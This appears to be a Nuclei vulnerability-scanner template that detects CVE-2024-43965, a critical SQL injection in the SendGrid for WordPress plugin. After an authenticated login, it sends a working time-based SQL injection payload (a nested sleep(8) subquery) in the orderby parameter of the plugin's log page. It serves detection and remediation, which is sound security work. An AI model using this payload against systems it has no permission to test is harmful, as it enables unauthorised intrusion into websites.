id: CVE-2024-43965

info:
  name: SendGrid for WordPress <= 1.4 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    Smackcoders SendGrid for WordPress [affected versions 1.4 and below] contains a SQL injection caused by improper neutralization of special elements used in an SQL command, letting attackers execute arbitrary SQL queries; exploitation requires crafted input.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion.
  remediation: |
    Update to the latest version of SendGrid for WordPress, version 1.5 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-43965
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-sendgrid-mailer/sendgrid-for-wordpress-14-unauthenticated-sql-injection
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-43965
    epss-score: 0.18426
    epss-percentile: 0.95404
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 3
  tags: cve,cve2024,wordpress,wp,wp-plugin,sqli,wp-sendgrid-mailer,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to={{RootURL}}/wp-admin/&testcookie=1

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 30s
        GET /wp-admin/admin.php?page=wp-mailplus-logs&orderby=sent_time%2c(select*from(select(sleep(8)))a)&order=asc HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'duration >= 8'
          - 'contains_all(body, "wp-mailplus", "SendGrid")'
        condition: and
# digest: 4a0a00473045022100915f9f25661962b7c5ab2ff2da05fb1973d724c8d7b2b496d3479b04bb9841b3022050d72b7f92eed438c1efd9438691aec2eaf2b01b141f61a714d63637554d0807:922c64590222798bb761d5b6d8e72950